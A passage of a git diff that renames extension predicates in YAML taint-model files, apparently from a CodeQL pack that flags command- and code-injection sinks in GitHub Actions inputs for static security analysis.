b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index f3ac66006d99..8f5e22fa2d96 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 9189245e2289..ff0131da99e3 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index bd64fc374236..1d82fb8f836f 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 9a20279e1103..1e4cc21dd130 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 8d06bc8a5121..ba729868a040 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 9d066ac23ecd..504f0693977d 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 71d837742315..48267b6d0820 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 563da9d4c0f4..26eea1d2341b 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 5194ce500fb1..7993d827fa6f 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 8c2f32627d90..de48ea5a7092 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index f74ae81a52c8..36a9b24f0891 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 877543ea8e4f..f04f8dda6c8e 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 1c9d4a7f6d98..a37d6452d504 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index a9d657247359..352eb51996af 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index d40014b9a129..44f34c11cb3d 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 7452ddc21876..3fd2e46296ab 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index a91d2c7b0e57..881374b6c903 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 95b5ba13ad17..6d77c866dc25 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 7157e1bea48a..0b27c5845844 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index a3f43d524b4a..911d3e571558 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 6e0d980943a1..1ac668cf55ac 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index ef682ff4fffe..5cf121dcef26 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 7ce84599d17d..d946204e9b96 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 47f1c83016f5..c6839a7b004e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 54353368db2e..9e708bbcc898 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 119115c15609..cfb67540b174 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 762623ed27e2..7186433e6d27 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index 2272d7ff8e68..d39aafe162ff 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 3537169892a4..a3b53b3ec960 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index dfac696dddf3..2a35d22a10e0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] - ["apache/flink", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 2e28ad9e900c..156d244ece2d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 5c82922c35e0..fcda4b3dfec0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index d618f7b761fe..84877f57d8c2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index c49315d791a9..dcb93d013a09 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f58fcf336fcd..4776bb79067e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 4812eaa5b4a3..2540e6a76ca7 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index de8c3e1b7259..525064de6a97 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index dee268884a14..b46d5a3ee6a8 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 5e0e51583902..631457c813e4 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index bb4b41a05928..44d9eb10a0dc 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index ef3a84762dbf..0d7f80698f57 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 425242bf220e..84caa0434846 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 62f1ed005edc..f6aed253a21d 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 098b460bbd87..1eac49617f22 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index d5a257be220a..1efa6815c280 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 53c6258551f4..91463a305dd9 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 62a4f2bbcd7b..7ef240ad999c 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 6dffbff40d31..db953acf5bc7 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index ac72bb9ebf04..7c1b01e14b5a 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index b3f1ca67eef7..37b67a933a3a 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 44f5ad660960..570a9bdd142c 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] diff --git 